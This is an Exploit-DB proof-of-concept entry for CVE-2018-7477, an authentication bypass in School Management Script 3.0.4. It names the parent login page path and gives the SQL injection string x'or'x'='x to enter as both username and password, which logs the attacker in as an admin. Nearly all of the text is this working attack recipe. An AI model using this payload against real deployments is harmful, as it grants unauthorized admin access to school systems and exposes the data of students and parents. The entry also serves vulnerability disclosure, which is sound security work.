School Management Script 3.0.4 - Authentication Bypass

EDB-ID: 44191
Author: Samiran Santra
Published: 2018-02-27
CVE: CVE-2018-7477
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Date: 26/02/2018 
 # Exploit Author: Samiran Santra 
 # Vendor Homepage: https://www.phpscriptsmall.com 
 # Software Link: https://www.phpscriptsmall.com/product/school-management-system 
 # Version: v3.0.4 
 #Tested on: Windows  
 # Website: https://indiancybersecuritysolutions.com/ 
 # CVE: CVE-2018-7477 
 # Category: webapps 
  
  
 Proof of Concept 
  
  
 1.First go to this link- http://localhost/PATH/parents/Parent_module/parent_login.php 
  
 2.In Username and Password filed just type sql-injection cheat-code (x'or'x'='x) 
  
 3.Now you can successfully login as a admin user

Source: www.exploit-db.com